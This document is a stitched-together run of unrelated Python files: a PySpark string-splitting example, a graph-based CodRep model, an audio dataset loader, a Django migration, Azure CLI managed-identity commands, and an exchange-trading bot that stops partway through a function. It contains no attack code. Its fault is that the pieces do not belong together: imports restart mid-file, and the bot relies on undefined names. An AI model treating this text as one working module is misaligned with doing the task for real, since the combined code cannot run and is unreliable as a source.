# -*- coding: utf-8 -*-
"""
author SparkByExamples.com
"""
import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import split, regexp_replace, col
spark=SparkSession.builder.appName("sparkbyexamples").getOrCreate()
data = [('James','','Smith','1991-04-01'),
('Michael','Rose','','2000-05-19'),
('Robert','','Williams','1978-09-05'),
('Maria','Anne','Jones','1967-12-01'),
('Jen','Mary','Brown','1980-02-17')
]
columns=["firstname","middlename","lastname","dob"]
df=spark.createDataFrame(data,columns)
df.printSchema()
df.show(truncate=False)
df1 = df.withColumn('year', split(df['dob'], '-').getItem(0)) \
.withColumn('month', split(df['dob'], '-').getItem(1)) \
.withColumn('day', split(df['dob'], '-').getItem(2))
df1.printSchema()
df1.show(truncate=False)
# Alternatively we can do like below
split_col = pyspark.sql.functions.split(df['dob'], '-')
df2 = df.withColumn('year', split_col.getItem(0)) \
.withColumn('month', split_col.getItem(1)) \
.withColumn('day', split_col.getItem(2))
df2.show(truncate=False)
# Using split() function of Column class
split_col = pyspark.sql.functions.split(df['dob'], '-')
df3 = df.select("firstname","middlename","lastname","dob", split_col.getItem(0).alias('year'),split_col.getItem(1).alias('month'),split_col.getItem(2).alias('day'))
df3.show(truncate=False)
"""
df4=spark.createDataFrame([("20-13-2012-monday",)], ['date',])
df4.select(split(df4.date,'^([\d]+-[\d]+-[\d]+)').alias('date'),
regexp_replace(split(df4.date,'^([\d]+-[\d]+-[\d]+)').getItem(1),'-','').alias('day')).show()
"""
df4 = spark.createDataFrame([('oneAtwoBthree',)], ['str',])
df4.select(split(df4.str, '[AB]').alias('str')).show()
df4.select(split(df4.str, '[AB]',2).alias('str')).show()
df4.select(split(df4.str, '[AB]',1).alias('str')).show()
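# Note on the third argument of split() (the regex `limit`, available since
# Spark 3.0): with limit=2 the pattern is applied at most once, giving
# ['one', 'twoBthree']; with limit=1 no split occurs and the whole string
# comes back as a single-element array: ['oneAtwoBthree'].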
from bisect import bisect_right
from logging import getLogger
from typing import Any, Dict, List, Optional, Union
from dgl import BatchedDGLGraph, unbatch
from pytorch_lightning import data_loader, LightningModule
from torch import stack as torch_stack, Tensor
from torch.nn import LogSoftmax, Module, NLLLoss
from torch.optim import Adam
from torch.optim.lr_scheduler import _LRScheduler as Scheduler
from torch.optim.optimizer import Optimizer
from torch.utils.data import DataLoader, Dataset
from mloncode.data.instance import Instance
from mloncode.modules.graph_encoders.graph_encoder import GraphEncoder
from mloncode.modules.misc.graph_embedding import GraphEmbedding
from mloncode.modules.misc.selector import Selector
from mloncode.utils.torch_helpers import data_if_packed
class CodRepModel(LightningModule):
"""
CodRep Model.
Uses a graph encoder and a projection decoder with an optional RNN.
"""
_logger = getLogger(__name__)
def __init__(
self,
graph_embedder: GraphEmbedding,
graph_encoder: GraphEncoder,
class_projection: Module,
graph_field_name: str,
feature_field_names: List[str],
indexes_field_name: str,
label_field_name: str,
instance: Instance,
train_dataset: Dataset,
eval_dataset: Optional[Dataset],
test_dataset: Optional[Dataset],
batch_size: int,
lr: float,
) -> None:
"""Construct a complete model."""
super().__init__()
self.graph_embedder = graph_embedder
self.graph_encoder = graph_encoder
self.selector = Selector()
self.class_projection = class_projection
self.graph_field_name = graph_field_name
self.feature_field_names = feature_field_names
self.indexes_field_name = indexes_field_name
self.label_field_name = label_field_name
self.softmax = LogSoftmax(dim=1)
self.instance = instance
self.train_dataset = train_dataset
self.eval_dataset = eval_dataset
self.test_dataset = test_dataset
self.batch_size = batch_size
self.lr = lr
def forward(
self,
graph: BatchedDGLGraph,
etypes: Tensor,
features: List[Tensor],
formatting_indexes: Tensor,
) -> Tensor:
"""Forward pass of an embedder, encoder and decoder."""
graph = self.graph_embedder(graph=graph, features=features)
encodings = self.graph_encoder(
graph=graph, feat=graph.ndata["x"], etypes=etypes
)
label_encodings = self.selector(tensor=encodings, indexes=formatting_indexes)
projections = self.class_projection(label_encodings)
return self.softmax(projections)
def training_step(self, batch: Dict[str, Any], batch_nb: int) -> Dict[str, Any]:
graph, etypes = batch[self.graph_field_name]
features = [batch[field_name] for field_name in self.feature_field_names]
formatting_indexes = batch[self.indexes_field_name].indexes
labels = batch[self.label_field_name]
forward = self.forward(graph, etypes, features, formatting_indexes)
loss = NLLLoss(
weight=forward.new_tensor(
[graph.batch_size, formatting_indexes.numel() - graph.batch_size]
)
)(forward, labels)
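        # The class weights counter the label imbalance: assuming one target
        # formatting position per graph (class 1) and the remaining indexes
        # negatives (class 0), each class is weighted by the other's count.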
loss_item = data_if_packed(loss).item()
return dict(
loss=loss,
log=dict(
train_cross_entropy=loss_item,
perplexity=2 ** loss_item,
mrr=self.mrr(labels, graph, formatting_indexes, forward),
),
)
def validation_step(self, batch: Dict[str, Any], batch_nb: int) -> Dict[str, Any]:
graph, etypes = batch[self.graph_field_name]
features = [batch[field_name] for field_name in self.feature_field_names]
formatting_indexes = batch[self.indexes_field_name].indexes
labels = batch[self.label_field_name]
forward = self.forward(graph, etypes, features, formatting_indexes)
loss = NLLLoss(
weight=forward.new_tensor(
[graph.batch_size, formatting_indexes.numel() - graph.batch_size]
)
)(forward, labels)
return dict(
eval_loss=loss,
eval_cross_entropy=self.cross_entropy(loss),
eval_perplexity=self.perplexity(loss),
eval_mrr=self.mrr(labels, graph, formatting_indexes, forward),
)
def validation_end(self, outputs: List[Dict[str, Any]]) -> Dict[str, Any]:
avg_loss = torch_stack([x["eval_loss"] for x in outputs]).mean()
def average(input_list: List[Dict[str, Any]], key: str) -> float:
return sum(i[key] for i in input_list) / len(input_list)
return dict(
avg_val_loss=avg_loss,
log=dict(
eval_loss=avg_loss,
eval_cross_entropy=average(outputs, "eval_cross_entropy"),
eval_perplexity=average(outputs, "eval_perplexity"),
eval_mrr=average(outputs, "eval_mrr"),
),
)
def decode(
self,
*,
batched_graph: BatchedDGLGraph,
indexes: Tensor,
offsets: Tensor,
forward: Tensor,
paths: List[str],
prefix: str = "",
metadata: Optional[Dict[str, Any]] = None
) -> None:
graphs = unbatch(batched_graph)
start = 0
total_number_of_nodes = 0
bounds = []
numpy_indexes = indexes.cpu().numpy()
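        # Each graph in the batch owns a contiguous range of node ids, so the
        # sorted formatting indexes can be partitioned into per-graph
        # (start, end) slices by binary-searching the running node counts.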
for graph in graphs:
total_number_of_nodes += graph.number_of_nodes()
end = bisect_right(numpy_indexes, total_number_of_nodes - 1)
bounds.append((start, end))
start = end
for (start, end), path in zip(bounds, paths):
path_probas = forward[start:end, 1]
path_indexes = offsets[start:end]
predictions = path_indexes[path_probas.argsort(descending=True)]
if metadata is not None and "metadata" in metadata:
metadata["metadata"][path] = {
index: ["%.8f" % (2 ** proba)]
for index, proba in zip(path_indexes.tolist(), path_probas.tolist())
}
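            # Shift from 0-based offsets to the 1-based line numbers the
            # CodRep output format presumably expects.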
predictions += 1
print("%s%s %s" % (prefix, path, " ".join(map(str, predictions.numpy()))))
def build_metadata(self) -> Dict[str, Any]:
return dict(columns=["Probability"], metadata={})
def configure_optimizers(
self,
) -> Union[Optimizer, Scheduler, List[Union[Optimizer, Scheduler]]]:
return Adam(self.parameters(), lr=self.lr)
@data_loader
def train_dataloader(self) -> DataLoader:
return DataLoader(
self.train_dataset,
shuffle=True,
collate_fn=self.instance.collate,
batch_size=self.batch_size,
num_workers=1,
)
@data_loader
    def val_dataloader(self) -> Optional[DataLoader]:
return (
DataLoader(
self.eval_dataset,
shuffle=True,
collate_fn=self.instance.collate,
batch_size=self.batch_size,
num_workers=1,
)
if self.eval_dataset is not None
else None
)
@data_loader
    def test_dataloader(self) -> Optional[DataLoader]:
return (
DataLoader(
self.test_dataset,
shuffle=True,
collate_fn=self.instance.collate,
batch_size=self.batch_size,
num_workers=1,
)
if self.test_dataset is not None
else None
)
@staticmethod
def mrr(
labels: Tensor, batched_graph: BatchedDGLGraph, indexes: Tensor, forward: Tensor
) -> float:
graphs = unbatch(batched_graph)
start = 0
total_number_of_nodes = 0
bounds = []
numpy_indexes = indexes.cpu().numpy()
for graph in graphs:
total_number_of_nodes += graph.number_of_nodes()
end = bisect_right(numpy_indexes, total_number_of_nodes - 1)
bounds.append((start, end))
start = end
ranks = []
for start, end in bounds:
predictions = data_if_packed(forward)[start:end, 1].argsort(descending=True)
ground_truth = data_if_packed(labels)[start:end].argmax(dim=0)
ranks.append((predictions == ground_truth).nonzero().item())
return sum(1 / (rank + 1) for rank in ranks) / len(ranks)
@staticmethod
def cross_entropy(loss: Tensor) -> float:
return data_if_packed(loss).item()
@staticmethod
def perplexity(loss: Tensor) -> float:
return 2 ** data_if_packed(loss).item()
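# A minimal, self-contained sketch (not part of the original module) of the
# bisect-based partitioning used by `decode` and `mrr` above: node-level
# indexes of a batched graph are split into per-graph (start, end) slices by
# binary-searching the running node-count offsets.
from bisect import bisect_right


def partition_indexes(sorted_indexes, nodes_per_graph):
    """Return per-graph (start, end) bounds into `sorted_indexes`."""
    bounds, start, total = [], 0, 0
    for n in nodes_per_graph:
        total += n
        end = bisect_right(sorted_indexes, total - 1)
        bounds.append((start, end))
        start = end
    return bounds


# Two graphs with 3 and 4 nodes; indexes 0 and 2 fall in the first graph's
# node range [0, 3), the rest in the second's [3, 7).
assert partition_indexes([0, 2, 3, 5, 6], [3, 4]) == [(0, 2), (2, 5)]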
from pathlib import Path
import re
import torchaudio
def remove_non_alphanumeric(text):
return re.sub(r'[\W_]+', '', text)
def load_data(path_str: str):
"""
Yields waveform and text from a given transcription folder
"""
path = Path(path_str)
with open(path / "metadata.csv") as f:
lines = f.read().splitlines()
for line in lines:
record_id, _text, normalized_text = line.split("|")
audio_path = Path(path) / "wavs" / f"{record_id}.wav"
waveform, _sample_rate = torchaudio.load(audio_path)
yield waveform, remove_non_alphanumeric(normalized_text)
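# Minimal usage sketch (assumes an LJSpeech-style layout with metadata.csv
# and a wavs/ subdirectory; the path is illustrative):
# for waveform, text in load_data("LJSpeech-1.1"):
#     print(waveform.shape, text[:40])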
# Generated by Django 2.1 on 2018-09-30 13:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('election', '0003_candidate_election_id'),
]
operations = [
migrations.AddField(
model_name='election',
name='election_description',
field=models.TextField(default='', max_length=500),
),
migrations.AddField(
model_name='election',
name='election_pic',
field=models.FileField(null=True, upload_to=''),
),
migrations.AddField(
model_name='election',
name='election_region',
field=models.CharField(default='', max_length=50),
),
]
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from ._clierror import ConflictRequestError
from ._utils import wait_till_end
from .vendored_sdks.appplatform.v2023_07_01_preview import models
from azure.cli.core.azclierror import (AzureInternalError, CLIInternalError)
from azure.core.exceptions import HttpResponseError
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.commands import arm as _arm
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import (ResourceType, get_sdk)
from knack.log import get_logger
from time import sleep
logger = get_logger(__name__)
ENABLE_LOWER = "enable"
DISABLE_LOWER = "disable"
UPDATING_LOWER = "updating"
DELETING_LOWER = "deleting"
APP_CREATE_OR_UPDATE_SLEEP_INTERVAL = 2
def app_identity_assign(cmd,
client,
resource_group,
service,
name,
role=None,
scope=None,
system_assigned=None,
user_assigned=None):
"""
Note: Always use sync method to operate managed identity to avoid data inconsistency.
:param role: role name of role assignment for system-assigned managed identity.
:param scope: scope of role assignment for system-assigned managed identity.
    :param system_assigned: 1. None or False: Don't change system-assigned managed identity.
                            2. True: Enable system-assigned managed identity on app.
    :param user_assigned: 1. None: Don't change user-assigned managed identities.
                          2. A non-empty list of user-assigned managed identity resource ids to assign to the app.
                          3. An empty list: should be blocked by validator.
"""
# TODO(jiec): Retire legacy identity assign after migration.
poller = None
if _is_legacy_identity_assign(system_assigned, user_assigned):
poller = _legacy_app_identity_assign(cmd, client, resource_group, service, name)
else:
poller = _new_app_identity_assign(cmd, client, resource_group, service, name, system_assigned, user_assigned)
    wait_till_end(cmd, poller)
poller.result()
if "succeeded" != poller.status().lower():
return poller
if role and scope:
_create_role_assignment(cmd, client, resource_group, service, name, role, scope)
return client.apps.get(resource_group, service, name)
def app_identity_remove(cmd,
client,
resource_group,
service,
name,
system_assigned=None,
user_assigned=None):
"""
Note: Always use sync method to operate managed identity to avoid data inconsistency.
:param system_assigned: 1) None or False: Don't change system-assigned managed identity.
2) True: remove system-assigned managed identity
:param user_assigned: 1) None: Don't change user-assigned managed identities.
2) An empty list: remove all user-assigned managed identities.
3) A non-empty list of user-assigned managed identity resource id to remove.
"""
app = client.apps.get(resource_group, service, name)
if _app_not_updatable(app):
raise ConflictRequestError("Failed to remove managed identities since app is in {} state.".format(app.properties.provisioning_state))
if not app.identity:
logger.warning("Skip remove managed identity since no identities assigned to app.")
return
if not app.identity.type:
raise AzureInternalError("Invalid existed identity type {}.".format(app.identity.type))
if app.identity.type == models.ManagedIdentityType.NONE:
logger.warning("Skip remove managed identity since identity type is {}.".format(app.identity.type))
return
# TODO(jiec): For back-compatible, convert to remove system-assigned only case. Remove code after migration.
if system_assigned is None and user_assigned is None:
system_assigned = True
new_user_identities = _get_new_user_identities_for_remove(app.identity.user_assigned_identities, user_assigned)
new_identity_type = _get_new_identity_type_for_remove(app.identity.type, system_assigned, new_user_identities)
user_identity_payload = _get_user_identity_payload_for_remove(new_identity_type, user_assigned)
target_identity = models.ManagedIdentityProperties()
target_identity.type = new_identity_type
target_identity.user_assigned_identities = user_identity_payload
app_resource = models.AppResource()
app_resource.identity = target_identity
poller = client.apps.begin_update(resource_group, service, name, app_resource)
wait_till_end(cmd, poller)
poller.result()
if "succeeded" != poller.status().lower():
return poller
else:
return client.apps.get(resource_group, service, name)
def app_identity_force_set(cmd,
client,
resource_group,
service,
name,
system_assigned,
user_assigned):
"""
:param system_assigned: string, disable or enable
:param user_assigned: 1. A single-element string list with 'disable'
2. A non-empty list of user-assigned managed identity resource ID.
"""
exist_app = client.apps.get(resource_group, service, name)
if _app_not_updatable(exist_app):
raise ConflictRequestError("Failed to force set managed identities since app is in {} state.".format(
exist_app.properties.provisioning_state))
new_identity_type = _get_new_identity_type_for_force_set(system_assigned, user_assigned)
user_identity_payload = _get_user_identity_payload_for_force_set(user_assigned)
target_identity = models.ManagedIdentityProperties()
target_identity.type = new_identity_type
target_identity.user_assigned_identities = user_identity_payload
    # All read-only attributes will be dropped by the SDK automatically.
exist_app.identity = target_identity
exist_app.properties.secrets = None
poller = client.apps.begin_create_or_update(resource_group, service, name, exist_app)
wait_till_end(cmd, poller)
poller.result()
if "succeeded" != poller.status().lower():
return poller
else:
return client.apps.get(resource_group, service, name)
def app_identity_show(cmd, client, resource_group, service, name):
app = client.apps.get(resource_group, service, name)
return app.identity
def _is_legacy_identity_assign(system_assigned, user_assigned):
return not system_assigned and not user_assigned
def _legacy_app_identity_assign(cmd, client, resource_group, service, name):
"""
Enable system-assigned managed identity on app.
"""
app = client.apps.get(resource_group, service, name)
if _app_not_updatable(app):
raise ConflictRequestError("Failed to enable system-assigned managed identity since app is in {} state.".format(
app.properties.provisioning_state))
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
if app.identity and app.identity.type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
target_identity = models.ManagedIdentityProperties(type=new_identity_type)
app_resource = models.AppResource(identity=target_identity)
logger.warning("Start to enable system-assigned managed identity.")
return client.apps.begin_update(resource_group, service, name, app_resource)
def _new_app_identity_assign(cmd, client, resource_group, service, name, system_assigned, user_assigned):
app = client.apps.get(resource_group, service, name)
if _app_not_updatable(app):
raise ConflictRequestError(
"Failed to assign managed identities since app is in {} state.".format(app.properties.provisioning_state))
new_identity_type = _get_new_identity_type_for_assign(app, system_assigned, user_assigned)
user_identity_payload = _get_user_identity_payload_for_assign(new_identity_type, user_assigned)
identity_payload = models.ManagedIdentityProperties()
identity_payload.type = new_identity_type
identity_payload.user_assigned_identities = user_identity_payload
app_resource = models.AppResource(identity=identity_payload)
logger.warning("Start to assign managed identities to app.")
return client.apps.begin_update(resource_group, service, name, app_resource)
def _get_new_identity_type_for_assign(app, system_assigned, user_assigned):
new_identity_type = None
if app.identity and app.identity.type:
new_identity_type = app.identity.type
else:
new_identity_type = models.ManagedIdentityType.NONE
if system_assigned:
if new_identity_type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
else:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
if user_assigned:
if new_identity_type in (models.ManagedIdentityType.SYSTEM_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
else:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
if not new_identity_type or new_identity_type == models.ManagedIdentityType.NONE:
raise CLIInternalError("Internal error: invalid new identity type:{}.".format(new_identity_type))
return new_identity_type
def _get_user_identity_payload_for_assign(new_identity_type, new_user_identity_rid_list):
"""
:param new_user_identity_rid_list: 1. None object.
2. A non-empty list of user-assigned managed identity resource ID.
:return 1. None object.
2. A dict from user-assigned managed identity to an empty object.
"""
uid_payload = {}
if new_identity_type == models.ManagedIdentityType.SYSTEM_ASSIGNED:
pass
elif new_identity_type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
if new_user_identity_rid_list:
for rid in new_user_identity_rid_list:
uid_payload[rid] = models.UserAssignedManagedIdentity()
if len(uid_payload) == 0:
uid_payload = None
return uid_payload
def _create_role_assignment(cmd, client, resource_group, service, name, role, scope):
app = client.apps.get(resource_group, service, name)
if not app.identity or not app.identity.principal_id:
raise AzureInternalError(
"Failed to create role assignment without object ID(principal ID) of system-assigned managed identity.")
identity_role_id = _arm.resolve_role_id(cmd.cli_ctx, role, scope)
assignments_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION).role_assignments
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=identity_role_id,
principal_id=app.identity.principal_id)
logger.warning("Creating an assignment with a role '%s' on the scope of '%s'", identity_role_id, scope)
retry_times = 36
assignment_name = _arm._gen_guid()
for i in range(0, retry_times):
try:
assignments_client.create(scope=scope, role_assignment_name=assignment_name,
parameters=parameters)
break
except (HttpResponseError, CloudError) as ex:
if 'role assignment already exists' in ex.message:
logger.warning('Role assignment already exists')
break
            elif i < retry_times - 1 and ' does not exist in the directory ' in ex.message:
sleep(APP_CREATE_OR_UPDATE_SLEEP_INTERVAL)
logger.warning('Retrying role assignment creation: %s/%s', i + 1,
retry_times)
continue
else:
raise
def _get_new_user_identities_for_remove(exist_user_identity_dict, user_identity_list_to_remove):
"""
    :param exist_user_identity_dict: A dict from user-assigned managed identity resource id to identity object.
:param user_identity_list_to_remove: None, an empty list or a list of string of user-assigned managed identity resource id to remove.
:return A list of string of user-assigned managed identity resource ID.
"""
if not exist_user_identity_dict:
return []
# None
if user_identity_list_to_remove is None:
return list(exist_user_identity_dict.keys())
# Empty list means remove all user-assigned managed identities
if len(user_identity_list_to_remove) == 0:
return []
# Non-empty list
new_identities = []
for id in exist_user_identity_dict.keys():
if not id.lower() in user_identity_list_to_remove:
new_identities.append(id)
return new_identities
def _get_new_identity_type_for_remove(exist_identity_type, is_remove_system_identity, new_user_identities):
new_identity_type = exist_identity_type
exist_identity_type_str = exist_identity_type.lower()
if exist_identity_type_str == models.ManagedIdentityType.NONE.lower():
new_identity_type = models.ManagedIdentityType.NONE
elif exist_identity_type_str == models.ManagedIdentityType.SYSTEM_ASSIGNED.lower():
if is_remove_system_identity:
new_identity_type = models.ManagedIdentityType.NONE
else:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
elif exist_identity_type_str == models.ManagedIdentityType.USER_ASSIGNED.lower():
if not new_user_identities:
new_identity_type = models.ManagedIdentityType.NONE
else:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
elif exist_identity_type_str == models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED.lower():
if is_remove_system_identity and not new_user_identities:
new_identity_type = models.ManagedIdentityType.NONE
elif not is_remove_system_identity and not new_user_identities:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
elif is_remove_system_identity and new_user_identities:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
else:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
else:
raise AzureInternalError("Invalid identity type: {}.".format(exist_identity_type_str))
return new_identity_type
def _get_user_identity_payload_for_remove(new_identity_type, user_identity_list_to_remove):
"""
:param new_identity_type: ManagedIdentityType
:param user_identity_list_to_remove: None, an empty list or a list of string of user-assigned managed identity resource id to remove.
:return None object or a non-empty dict from user-assigned managed identity resource id to None object
"""
user_identity_payload = {}
if new_identity_type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
        # empty list means remove all user-assigned managed identities
if user_identity_list_to_remove is not None and len(user_identity_list_to_remove) == 0:
raise CLIInternalError("When remove all user-assigned managed identities, "
"target identity type should not be {}.".format(new_identity_type))
# non-empty list
elif user_identity_list_to_remove:
for id in user_identity_list_to_remove:
user_identity_payload[id] = None
if not user_identity_payload:
user_identity_payload = None
return user_identity_payload
def _get_new_identity_type_for_force_set(system_assigned, user_assigned):
new_identity_type = models.ManagedIdentityType.NONE
if DISABLE_LOWER == system_assigned and DISABLE_LOWER != user_assigned[0]:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
elif ENABLE_LOWER == system_assigned and DISABLE_LOWER == user_assigned[0]:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
elif ENABLE_LOWER == system_assigned and DISABLE_LOWER != user_assigned[0]:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
return new_identity_type
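# The function above implements this decision table
# (system_assigned x user_assigned[0]):
#   disable / disable -> NONE
#   disable / <ids>   -> USER_ASSIGNED
#   enable  / disable -> SYSTEM_ASSIGNED
#   enable  / <ids>   -> SYSTEM_ASSIGNED_USER_ASSIGNED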
def _get_user_identity_payload_for_force_set(user_assigned):
if DISABLE_LOWER == user_assigned[0]:
return None
user_identity_payload = {}
for user_identity_resource_id in user_assigned:
user_identity_payload[user_identity_resource_id] = models.UserAssignedManagedIdentity()
if not user_identity_payload:
user_identity_payload = None
return user_identity_payload
def _app_not_updatable(app):
return app.properties \
and app.properties.provisioning_state \
and app.properties.provisioning_state.lower() in [UPDATING_LOWER, DELETING_LOWER]
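# Illustrative (assumed) CLI invocations that map to the handlers above;
# exact command and flag names depend on the CLI extension version:
#   az spring app identity assign -g <rg> -s <service> -n <app> --system-assigned
#   az spring app identity remove -g <rg> -s <service> -n <app> --user-assigned <resource-id>
#   az spring app identity force-set -g <rg> -s <service> -n <app> \
#       --system-assigned enable --user-assigned disable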
#!/usr/bin/python
# ~~~~~============== HOW TO RUN ==============~~~~~
# 1) Configure things in CONFIGURATION section
# 2) Change permissions: chmod +x bot.py
# 3) Run in loop: while true; do ./bot.py; sleep 1; done
from __future__ import print_function
import sys
import socket
import json
# ~~~~~============== CONFIGURATION ==============~~~~~
# your team name, as registered with the exchange
team_name="teamowo"
# This variable dictates whether the bot is connecting to the prod
# or test exchange. Be careful with this switch!
test_mode = True
# This setting changes which test exchange is connected to.
# 0 is prod-like
# 1 is slower
# 2 is empty
test_exchange_index=0
prod_exchange_hostname="production"
port=25000 + (test_exchange_index if test_mode else 0)
exchange_hostname = "test-exch-" + team_name if test_mode else prod_exchange_hostname
# ~~~~~============== NETWORKING CODE ==============~~~~~
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write("\n")
def read_from_exchange(exchange):
return json.loads(exchange.readline())
# ~~~~~============== FUNCTIONS ==============~~~~~
def add_to_exchange(price, size, direction, symbol, exchange):
global order_id
generate_order_id()
#print({"type": "add", order_id: order_id, "symbol": symbol, "dir": direction, "price": price, "size": size})
write_to_exchange(exchange, {"type": "add", "order_id": order_id, "symbol": symbol, "dir": direction, "price": price, "size": size})
# buy a stock at price
def buy_stock(price, size, symbol):
if not validate_symbol(symbol):
print("INVALID BUY SYMBOL")
return
print("BUYING " + symbol)
add_to_exchange(price, size, "BUY", symbol, exchange)
def buy_stock_XLF(price, size, symbol):
print("HIIIIIIIIIIIIII")
if not validate_symbol(symbol):
print("INVALID BUY SYMBOL")
return
print("BUYING " + symbol)
add_to_exchange(price, size, "BUY", symbol, exchange)
def sell_stock(price, size, symbol):
if not validate_symbol(symbol):
print("INVALID SELL SYMBOL")
return
print("SELLING " + symbol)
add_to_exchange(price, size, "SELL", symbol, exchange)
# ~~~~~============== PARSING MESSAGES ==============~~~~~
'''
Takes in a bond dictionary message, returns the bond price
'''
def parse_message(message):
if message["type"] == "book":
parse_book(message)
elif message["type"] == "fill":
parse_fill(message)
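# Assumed shape of a "book" message, inferred from how parse_book indexes it
# (each side is a list of [price, size] pairs, best price first):
#   {"type": "book", "symbol": "BOND", "buy": [[999, 10], ...], "sell": [[1001, 5], ...]}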
# Buy at the lowest ask and sell for a little more than the current lowest
# ask, making sure the sell price stays above the buy price.
def parse_book(message):
if message["symbol"] == "BOND":
# get the price and try to buy the lowest
update_stock_values(message) # this is bond, please update haha
bond_market_sell_prices = message["sell"]
bond_market_buy_prices = message["buy"]
'''
if len(bond_market_sell_prices) > 0:
# someone is only selling, so we can buy if the price is right
bond_lowest_sell = bond_market_sell_prices[0][0]
bond_lowest_sell_amount = bond_market_sell_prices[0][1]
if bond_lowest_sell < 1001:
buy_bond(bond_lowest_sell, min(bond_lowest_sell_amount, 100 - inventory['BOND'])) # can only have 100 bonds max
if len(bond_market_buy_prices) > 0:
bond_highest_buy = bond_market_buy_prices[0][0]
bond_highest_buy_amount = bond_market_buy_prices[0][1]
'''
# someone is only buying, so we can try to sell to them
if len(bond_market_sell_prices) == 0 or len(bond_market_buy_prices) == 0:
return
bond_lowest_sell = bond_market_sell_prices[0][0]
bond_lowest_sell_amount = bond_market_sell_prices[0][1]
bond_highest_buy = bond_market_buy_prices[0][0]
bond_highest_buy_amount = bond_market_buy_prices[0][1]
if bond_lowest_sell < 1001:
buy_stock(bond_lowest_sell, min(bond_lowest_sell_amount, 100 - inventory['BOND']), "BOND") # can only have 100 bonds max
            sell_stock(max(bond_lowest_sell + 1, bond_highest_buy), int(inventory['BOND']/2), "BOND")
elif message["symbol"] == "VALBZ":
valbz_market_sell_prices = message["sell"]
valbz_market_buy_prices = message["buy"]
if len(valbz_market_sell_prices) < 1 or len(valbz_market_buy_prices) < 1:
return
valbz_lowest_sell = valbz_market_sell_prices[0][0]
valbz_lowest_sell_amount = valbz_market_sell_prices[0][1]
valbz_highest_buy = valbz_market_buy_prices[0][0]
valbz_highest_buy_amount = valbz_market_buy_prices[0][1]
#if valbz_lowest_sell < 1001:
buy_stock(valbz_lowest_sell, min(valbz_lowest_sell_amount, 100 - inventory['VALE']), "VALE") # can only have 100 valbzs max
sell_stock(max(valbz_lowest_sell + 1, valbz_highest_buy), int(inventory['VALE']/3), "VALE")
#valbz_lowest_sell_VALBZ = message["sell"]
#valbz_highest_buy_VALBZ = message["buy"]
#if len(valbz_lowest_sell__VALBZ) == 0 or len(valbz_highest_buy_VALBZ == 0):
# return
#valbz_highest_buy_VALBZ_amount = valbz_highest_buy_VALBZ[0][0]
#valbz_lowest_sell_VALBZ_amount = valbz_lowest_sell_VALBZ[0][0]
elif (message["symbol"] == "GS" or message["symbol"] == "MS" or message["symbol"] == "WFC" or message["symbol"] == "BOND"):
update_stock_values(message)
if message["symbol"] == "GS":
gs_market_sell_prices = message["sell"]
gs_market_buy_prices = message["buy"]
if len(gs_market_sell_prices) < 1 or len(gs_market_buy_prices) < 1:
return
gs_lowest_sell = gs_market_sell_prices[0][0]
gs_lowest_sell_amount = gs_market_sell_prices[0][1]
gs_highest_buy = gs_market_buy_prices[0][0]
gs_highest_buy_amount = gs_market_buy_prices[0][1]
#if valbz_lowest_sell < 1001:
buy_stock(gs_lowest_sell, min(gs_lowest_sell_amount, 100 - inventory['GS']), "GS") # can only have 100 valbzs max
sell_stock(max(gs_lowest_sell + 1, gs_highest_buy), int(inventory['GS']/3), "GS")
if message["symbol"] == "MS":
ms_market_sell_prices = message["sell"]
ms_market_buy_prices = message["buy"]
if len(ms_market_sell_prices) < 1 or len(ms_market_buy_prices) < 1:
return
ms_lowest_sell = ms_market_sell_prices[0][0]
ms_lowest_sell_amount = ms_market_sell_prices[0][1]
ms_highest_buy = ms_market_buy_prices[0][0]
ms_highest_buy_amount = ms_market_buy_prices[0][1]
#if valbz_lowest_sell < 1001:
buy_stock(ms_lowest_sell, min(ms_lowest_sell_amount, 100 - inventory['MS']), "MS") # can only have 100 valbzs max
sell_stock(max(ms_lowest_sell + 1, ms_highest_buy), int(inventory['MS']/3), "MS")
elif message['symbol'] == 'XLF':
# weighted average of recent_buy_prices and recent_sell_prices
xlf_market_sell_prices = message['sell']
xlf_market_buy_prices = message['buy']
